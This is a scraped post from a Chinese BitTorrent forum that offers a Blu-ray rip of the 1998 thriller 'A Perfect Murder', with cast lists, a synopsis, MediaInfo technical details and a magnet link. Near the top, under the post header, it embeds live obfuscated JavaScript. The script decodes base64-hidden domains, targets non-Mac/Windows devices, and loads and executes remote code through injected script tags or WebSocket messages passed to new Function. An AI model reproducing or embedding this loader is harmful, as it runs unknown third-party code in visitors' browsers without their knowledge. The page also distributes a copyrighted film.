超完美谋杀案[简繁字幕]A.Perfect.Murder.1998.BluRay.1080p.DTS-HD.MA5.1.x265.10bit-迅雷下载 10.06GB

版主小s 6天前 242

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 超完美谋杀案 / 叛侣游戏 / 完美的谋杀

◎片 名 A Perfect Murder

◎年 代 1998

◎产 地 美国

◎类 别 惊悚 / 犯罪

◎语 言 英语

◎上映日期 1998-06-05

◎IMDb链接 https://www.imdb.com/title/tt0120787/

◎豆瓣评分 7.1/10 (19152人评价)

◎豆瓣链接 https://movie.douban.com/subject/1297509/

◎片 长 107 分钟

◎导 演 安德鲁·戴维斯 Andrew Davis (id:1055186)

◎编 剧 帕特里克·史密斯·凯利 Patrick Smith Kelly (id:1314968)

弗雷德里克·诺特 Frederick Knott (id:1050930)

◎演 员 迈克尔·道格拉斯 Michael Douglas (id:1053620)

格温妮斯·帕特洛 Gwyneth Paltrow (id:1018985)

维果·莫腾森 Viggo Mortensen (id:1054520)

大卫·苏切 David Suchet (id:1048162)

杰夫·威廉姆斯 Jeff Williams (id:1328430)

丽薇斯切尼迪 Evis Xheneti (id:1234068)

Christopher Del Gaudio (id:1225598)

Todo Segalla Todo Segalla (id:1186089)

大卫·艾根伯格 David Eigenberg (id:1044912)

Taylor McCall Taylor McCall (id:1171555)

德沃拉·纳尔逊 Novella Nelson (id:1135059)

康斯坦丝·陶尔斯 Constance Towers (id:1045168)

萨莉塔·乔德霍里 Sarita Choudhury (id:1055364)

劳琳达巴雷特 Laurinda Barrett (id:1061475)

格里·贝克尔 Gerry Becker (id:1063260)

里德·伯尼 Reed Birney (id:1063931)

威廉·博格特 William Bogert (id:1063997)

威尔·莱曼 Will Lyman (id:1115251)

Maeve McGuire Maeve McGuire (id:1121700)

Jack Mulcahy Jack Mulcahy (id:1128837)

Aideen O'Kelly Aideen O'Kelly (id:1131774)

迈克尔·P·莫兰 Michael P. Moran (id:1132281)

阿诺德·科派尔森 Arnold Kopelson (id:1005327)

Peter Macgregor-Scott Peter Macgregor-Scott (id:1290621)

克里斯托弗·曼凯维奇 Christopher Mankiewicz (id:1029178)

詹姆斯·纽顿·霍华德 James Newton Howard (id:1019135)

达瑞兹·沃斯基 Dariusz Wolski (id:1276296)

丹尼斯·弗尔克勒 Dennis Virkler (id:1300109)

多夫·霍尼希 Dov Hoenig (id:1286751)

凯茜·桑德里奇 Cathy Sandrich (id:1296638)

Amanda Mackey Johnson Amanda Mackey Johnson (id:1290650)

菲利普·罗森伯格 Philip Rosenberg (id:1146904)

黛布拉·舒特 Debra Schutt (id:1296994)

艾伦·米罗伊尼克 Ellen Mirojnick (id:1010099)

内奥米·多恩 Naomi Donne (id:1282577)

艾兰·丹格里奥 Alan D'Angerio (id:1281682)

米尔顿·布拉斯 Milton Buras (id:1279615)

埃米·劳瑞森 Amy Lauritsen (id:1289521)

◎标 签 悬疑 / 犯罪 / 美国 / 美国电影 / 惊悚 / MichaelDouglas / GwynethPaltrow / 1998

◎简 介

史蒂文·泰勒(迈克尔·道格拉斯 Michael Douglas 饰)身为一位叱咤华尔街的百万富豪,金钱和地位却始终无法令他满足,他渴望的是妻子艾米丽(格温妮斯·帕特洛 Gwyneth Paltrow 饰)的忠贞爱情,但却从来吝于表达自己对她的爱。美貌与才情兼备的艾米丽并不想成为丈夫身边的一只花瓶,工作之余她偶然结识了才华横溢的穷画家戴维·肖(维果·莫腾森 Viggo Mortensen 饰),从他那里尝到了丈夫不曾给过的爱恋激情。然而,频繁的幽会最终还是被泰勒察觉,妒火中烧加之妻子身后巨额保险金的诱惑,使泰勒渐渐萌生了杀妻之念,他精心策划了一起超完美谋杀案,然而再完美的计划也赶不上变化,一场猫鼠游戏才刚刚开始……

本片是翻拍自悬疑片大师希区柯克1954年的经典作品《完美的谋杀案》。

  1. General

  2. Unique ID : 197869693014116388309355265269889270629 (0x94DC511259C855C0FE056902CEFC8365)

  3. Complete name : A[email protected]BBQDDQ.COM.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 10.1 GiB

  7. Duration : 1 h 47 min

  8. Overall bit rate mode : Variable

  9. Overall bit rate : 13.4 Mb/s

  10. Encoded date : UTC 2021-07-19 11:56:50

  11. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  12. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@High

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 47 min

  20. Bit rate : 9 375 kb/s

  21. Width : 1 920 pixels

  22. Height : 1 080 pixels

  23. Display aspect ratio : 16:9

  24. Frame rate mode : Constant

  25. Frame rate : 23.976 (24000/1001/53354) FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.189

  30. Stream size : 7.04 GiB (70%)

  31. Title : HEVC, [email protected]@High, 24/1.001 fps @ 9375 kbps

  32. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  33. Encoding settings : cpuid=533541111039 / frame-threads=4 / numa-pools=16 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x1080 / interlace=0 / total-frames=154561 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=5 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=40 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=18.5 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=80000 / vbv-bufsize=80000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  34. Language : English

  35. Default : Yes

  36. Forced : No

  37. Color range : Limited

  38. Color primaries : BT.709

  39. Transfer characteristics : BT.709

  40. Matrix coefficients : BT.709


  41. Audio #1

  42. ID : 2

  43. Format : DTS XLL

  44. Format/Info : Digital Theater Systems

  45. Commercial name : DTS-HD Master Audio

  46. Codec ID : A_DTS

  47. Duration : 1 h 47 min

  48. Bit rate mode : Variable

  49. Bit rate : 3 577 kb/s

  50. Channel(s) : 6 channels

  51. Channel layout : C L R Ls Rs LFE

  52. Sampling rate : 48.0 kHz

  53. Frame rate : 93.750 FPS (512 SPF)

  54. Bit depth : 24 bits

  55. Compression mode : Lossless

  56. Stream size : 2.68 GiB (27%)

  57. Title : English DTS-HD Master Audio 5.1 @ 3577 kbps

  58. Language : English

  59. Default : Yes

  60. Forced : No


  61. Audio #2

  62. ID : 3

  63. Format : AC-3

  64. Format/Info : Audio Coding 3

  65. Commercial name : Dolby Digital

  66. Codec ID : A_AC3

  67. Duration : 1 h 47 min

  68. Bit rate mode : Constant

  69. Bit rate : 192 kb/s

  70. Channel(s) : 2 channels

  71. Channel layout : L R

  72. Sampling rate : 48.0 kHz

  73. Frame rate : 31.250 FPS (1536 SPF)

  74. Compression mode : Lossy

  75. Stream size : 148 MiB (1%)

  76. Title : English Dolby Digital Audio 2.0 @ 192 kbps Commentary 1

  77. Language : English

  78. Service kind : Complete Main

  79. Default : No

  80. Forced : No


  81. Audio #3

  82. ID : 4

  83. Format : AC-3

  84. Format/Info : Audio Coding 3

  85. Commercial name : Dolby Digital

  86. Codec ID : A_AC3

  87. Duration : 1 h 47 min

  88. Bit rate mode : Constant

  89. Bit rate : 192 kb/s

  90. Channel(s) : 2 channels

  91. Channel layout : L R

  92. Sampling rate : 48.0 kHz

  93. Frame rate : 31.250 FPS (1536 SPF)

  94. Compression mode : Lossy

  95. Stream size : 148 MiB (1%)

  96. Title : English Dolby Digital Audio 2.0 @ 192 kbps Commentary 2

  97. Language : English

  98. Service kind : Complete Main

  99. Default : No

  100. Forced : No


  101. Text #1

  102. ID : 5

  103. Format : PGS

  104. Codec ID : S_HDMV/PGS

  105. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  106. Duration : 1 h 44 min

  107. Bit rate : 25.9 kb/s

  108. Count of elements : 2132

  109. Stream size : 19.4 MiB (0%)

  110. Title : Eng/SUP

  111. Language : English

  112. Default : No

  113. Forced : No


  114. Text #2

  115. ID : 6

  116. Format : PGS

  117. Codec ID : S_HDMV/PGS

  118. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  119. Duration : 1 h 43 min

  120. Bit rate : 21.5 kb/s

  121. Count of elements : 1578

  122. Stream size : 15.9 MiB (0%)

  123. Title : Chs/SUP 简体

  124. Language : Chinese

  125. Default : Yes

  126. Forced : No


  127. Text #3

  128. ID : 7

  129. Format : PGS

  130. Codec ID : S_HDMV/PGS

  131. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  132. Duration : 1 h 43 min

  133. Bit rate : 21.9 kb/s

  134. Count of elements : 1578

  135. Stream size : 16.2 MiB (0%)

  136. Title : Cht/SUP 繁体

  137. Language : Chinese

  138. Default : No

  139. Forced : No


  140. Menu

  141. 00:00:00.000 : en:第 01 章

  142. 00:02:14.009 : en:第 02 章

  143. 00:08:09.864 : en:第 03 章

  144. 00:10:53.820 : en:第 04 章

  145. 00:13:18.339 : en:第 05 章

  146. 00:19:59.657 : en:第 06 章

  147. 00:22:32.226 : en:第 07 章

  148. 00:27:28.897 : en:第 08 章

  149. 00:32:49.676 : en:第 09 章

  150. 00:37:12.480 : en:第 10 章

  151. 00:39:03.007 : en:第 11 章

  152. 00:41:31.823 : en:第 12 章

  153. 00:45:06.078 : en:第 13 章

  154. 00:48:25.903 : en:第 14 章

  155. 00:51:29.086 : en:第 15 章

  156. 00:55:51.139 : en:第 16 章

  157. 00:58:50.944 : en:第 17 章

  158. 01:03:31.266 : en:第 18 章

  159. 01:06:28.818 : en:第 19 章

  160. 01:09:44.389 : en:第 20 章

  161. 01:10:55.501 : en:第 21 章

  162. 01:14:41.227 : en:第 22 章

  163. 01:18:36.503 : en:第 23 章

  164. 01:22:09.424 : en:第 24 章

  165. 01:28:31.473 : en:第 25 章

  166. 01:31:09.339 : en:第 26 章

  167. 01:35:01.696 : en:第 27 章

  168. 01:38:56.097 : en:第 28 章

  169. 01:40:49.043 : en:第 29 章

  170. 01:42:20.301 : en:第 30 章

  171. 01:43:22.696 : en:第 31 章

  172. 01:44:29.013 : en:第 32 章


TAGS 惊悚 犯罪

磁力链:
  • magnet:?xt=urn:btih:EC8247BE111EF7475613CD6E381E335569DBE2E5
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回